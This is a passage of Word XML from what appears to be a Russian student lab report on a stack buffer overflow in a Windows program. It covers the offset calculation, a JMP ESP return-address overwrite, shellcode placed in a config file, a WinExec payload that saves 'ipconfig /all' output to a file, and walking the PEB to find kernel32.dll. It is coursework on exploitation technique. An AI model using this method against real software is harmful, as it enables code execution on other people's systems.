          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EB8142E" wp14:editId="0503CC83">
            <wp:extent cx="5940425" cy="98044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01C8" w14:textId="231C0325" w:rsidR="000A4A35" w:rsidRDefault="000A4A35" w:rsidP="000A4A35">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Заполнение строки до размеров всего буфера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B2EFEB" w14:textId="14016429" w:rsidR="005A5E62" w:rsidRDefault="004767B2" w:rsidP="005A5E62">
      <w:r>
        <w:t>Далее по смещению 0хА06 заполнение строки заканчивается.</w:t>
      </w:r>
      <w:r w:rsidR="00785FFB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00785FFB" w:rsidRPr="00785FFB">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00785FFB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xA</w:t>
      </w:r>
      <w:r w:rsidR="00785FFB" w:rsidRPr="00785FFB">
        <w:t xml:space="preserve">06 = </w:t>
      </w:r>
      <w:r w:rsidR="00785FFB">
        <w:t xml:space="preserve">2566 – 48 (информация до </w:t>
      </w:r>
      <w:r w:rsidR="00785FFB" w:rsidRPr="00785FFB">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00785FFB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidR="00785FFB" w:rsidRPr="00785FFB">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00785FFB">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00785FFB" w:rsidRPr="00785FFB">
        <w:t xml:space="preserve"> 6 (</w:t>
      </w:r>
      <w:r w:rsidR="00785FFB">
        <w:t xml:space="preserve">длина </w:t>
      </w:r>
      <w:r w:rsidR="00785FFB" w:rsidRPr="00785FFB">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00785FFB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidR="00785FFB" w:rsidRPr="00785FFB">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00785FFB">
        <w:t xml:space="preserve"> = 2512.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Итого длина строки получилась 251</w:t>
      </w:r>
      <w:r w:rsidR="00785FFB">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> символов</w:t>
      </w:r>
      <w:r w:rsidR="005A5E62">
        <w:t>: 2508 символов заполняют массив</w:t>
      </w:r>
      <w:r w:rsidR="00A5085A">
        <w:t xml:space="preserve">, 4 байта заполняют </w:t>
      </w:r>
      <w:r w:rsidR="00EF747D">
        <w:t xml:space="preserve">адрес </w:t>
      </w:r>
      <w:r w:rsidR="007B36DE">
        <w:t xml:space="preserve">регистр </w:t>
      </w:r>
      <w:r w:rsidR="007B36DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:r w:rsidR="00EF747D">
        <w:t>, сохранённый от предыдущей функции</w:t>
      </w:r>
      <w:r w:rsidR="005A5E62">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0029301A">
        <w:t xml:space="preserve"> Здесь и происходит переполнение буфера путём затирания адреса возврата.</w:t>
      </w:r>
      <w:r w:rsidR="005A5E62">
        <w:t xml:space="preserve"> На Рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="005A5E62">
        <w:t xml:space="preserve"> представлено состояние стека во время эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284C2CDC" w14:textId="62CDFEA1" w:rsidR="005A5E62" w:rsidRDefault="00785FFB" w:rsidP="005A5E62">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BDD3376" wp14:editId="47D303D4">
            <wp:extent cx="5814060" cy="1844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" t="7280"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="58140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0B1F0" w14:textId="18BA9E79" w:rsidR="005A5E62" w:rsidRDefault="005A5E62" w:rsidP="005A5E62">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Состояние стека</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2466C525" w14:textId="5C98C66C" w:rsidR="00057122" w:rsidRDefault="004767B2" w:rsidP="00057122">
      <w:r>
        <w:t xml:space="preserve">Далее записан в обратном порядке адрес, на который будет совершен переход (Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Это статический адрес из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r w:rsidRPr="004767B2">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, которая не имеет никаких механизмов защиты. Адрес указывает на инструкцию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JMP</w:t>
      </w:r>
      <w:r w:rsidRPr="004767B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Регистр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESP</w:t>
      </w:r>
      <w:r w:rsidRPr="004767B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>является указателем на вершину стека. При переходе на стек там будет лежать весь остальной шелл</w:t>
      </w:r>
      <w:r w:rsidR="00E64319">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>код.</w:t>
      </w:r>
      <w:r w:rsidR="00F360BA">
        <w:t xml:space="preserve"> Поскольку стек в данной программе исполняемый</w:t>
      </w:r>
      <w:r w:rsidR="002D0B10">
        <w:t xml:space="preserve"> (отключен параметр </w:t>
      </w:r>
      <w:r w:rsidR="002D0B10">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NXCompat</w:t>
      </w:r>
      <w:r w:rsidR="002D0B10" w:rsidRPr="00ED4A4A">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00F360BA">
        <w:t>, то код выполнитс</w:t>
      </w:r>
      <w:r w:rsidR="006026B1">
        <w:t>я без ошибок.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51844BA3" w14:textId="4D390DAD" w:rsidR="00FF137D" w:rsidRPr="00FF137D" w:rsidRDefault="001D0C9A" w:rsidP="00FF137D">
      <w:r>
        <w:t>После адреса возврата необходимо восстановить переменные для успешного завершения функции. В частности, это требуется для</w:t>
      </w:r>
      <w:r w:rsidR="00057122" w:rsidRPr="00057122">
        <w:t xml:space="preserve"> действи</w:t>
      </w:r>
      <w:r>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidR="00057122" w:rsidRPr="00057122">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00057122" w:rsidRPr="00057122">
        <w:lastRenderedPageBreak/>
        <w:t>str[dst_len] = 0</w:t>
      </w:r>
      <w:r w:rsidR="00057122">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Поэтому восстановим </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF137D">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidR="00FF137D" w:rsidRPr="00FF137D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00FF137D">
        <w:t>И вот теперь располагается шелл-код, на который будет совершен переход по возвращении из уязвимой функции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CECE54F" w14:textId="7B6A5308" w:rsidR="000A4A35" w:rsidRDefault="00D86802" w:rsidP="00FF137D">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="558DB06B" wp14:editId="52452A40">
            <wp:extent cx="5844540" cy="33451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"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="58445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3D96C" w14:textId="200335FE" w:rsidR="000A4A35" w:rsidRDefault="00ED4A4A" w:rsidP="00683145">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Расположение шелл-кода в конфиге</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363B1BFA" w14:textId="77777777" w:rsidR="00A337FC" w:rsidRPr="00A337FC" w:rsidRDefault="00A337FC" w:rsidP="00A337FC"/>
    <w:p w14:paraId="773222B0" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00456E0A" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Реализация эксплойта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5969ABD4" w14:textId="3E663F37" w:rsidR="008E5E75" w:rsidRPr="00723821" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:r>
        <w:t xml:space="preserve">Теперь необходимо реализовать саму полезную нагрузку. В соответствии с вариантом задания необходимо произвести сохранение в файл параметров сети. Для этого используем команду </w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5" w:rsidRPr="00A10EA5">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5" w:rsidRPr="00A10EA5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00296810">
        <w:t>ipconfig /all &gt; c:\Users\heath\Desktop\net.txt.</w:t>
      </w:r>
      <w:r w:rsidR="00F343D2">
        <w:t xml:space="preserve"> С помощью </w:t>
      </w:r>
      <w:r w:rsidR="00F343D2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hex</w:t>
      </w:r>
      <w:r w:rsidR="00F343D2" w:rsidRPr="00F343D2">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00F343D2">
        <w:t>редактора</w:t>
      </w:r>
      <w:r w:rsidR="00F343D2" w:rsidRPr="00F343D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00723821">
        <w:t>получим эту строку в виде набора байт, перевернём их в обратном порядке и положим на стек.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F1C173" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:r>
        <w:t xml:space="preserve">Вызов этой программы будет осуществлён с помощью функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, которая имеет только два аргумента и экспортируется </w:t>
      </w:r>
      <w:r w:rsidRPr="006C1EE0">
        <w:t>kernel32.dll.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Данная библиотека подгружается к любому процессу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1EE0">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Сначала необходимо найти адрес этой библиотеки в процессе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66974605" w14:textId="429B0628" w:rsidR="008E5E75" w:rsidRPr="00220295" w:rsidRDefault="00000000" w:rsidP="008E5E75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Блок окружения потока (TEB)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> — это структура, которая уникальна для каждого потока, находится в памяти и содержит информацию о потоке. Адрес</w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="006443A6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>TEB</w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="006443A6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>хранится в регистре сегмента </w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>FS</w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Одним из полей </w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>TEB</w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> является </w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">указатель на структуру блока среды процесса (PEB), которая содержит информацию о процессе. Указатель на </w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>PEB</w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> равен </w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>0x30</w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> байт после начала </w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>TEB</w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>0x0C</w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> байт с самого начала </w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>PEB</w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержит указатель на структуру PEB_LDR_DATA, которая предоставляет информацию о загруженных DLL. Он содержит указатели на три двусвязных списка, два из которых особенно интересны для наших целей. Один из списков </w:t>
      </w:r>
      <w:r w:rsidR="008E5E75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>InInitializationOrderModuleList</w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, который содержит библиотеки в порядке их инициализации, а другой </w:t>
      </w:r>
      <w:r w:rsidR="008E5E75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> InMemoryOrderModuleList</w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> который содержит библиотеки в порядке их появления в памяти. Указатель на последний хранится в </w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>0x14</w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> байтах от начала структуры PEB_LDR_DATA. Базовый адрес DLL сохраняется </w:t>
      </w:r>
      <w:r w:rsidR="008E5E75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">на </w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>0x10</w:t>
      </w:r>
      <w:r w:rsidR="008E5E75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E5E75" w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>байт ниже его подключения к записи в списке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54662793" w14:textId="76BBD596" w:rsidR="008E5E75" w:rsidRPr="00220295" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>В версиях Windows до Vista первые две библиотеки в </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>InInitializationOrderModuleList</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> были </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>ntdll.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>kernel32.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, но для Vista и более поздних версий вторая DLL изменяется на </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>kernelbase.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295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220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Вторая и третья библиотеки в</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>InMemoryOrderModuleList</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>являются</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>ntdll.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295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220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>kernel32.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Это действительно для всех версий Windows и является предпочтительным методом, поскольку он более переносим.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E09129C" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00220295" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Итак, чтобы найти адрес</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>kernel32.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>мы должны пройти через несколько структур в памяти. Шаги для этого следующие:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1BCD33" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00220295" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r w:rsidRPr="00220295">
        <w:t>Получить адрес </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>PEB</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:t> с помощью </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>fs: 0x30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C1855" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00220295" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r w:rsidRPr="00220295">
        <w:t>Получить адрес </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>PEB_LDR_DATA</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:t> (смещение </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>0x0C</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:t>)</w:t>
      </w:r>
    </w:p>
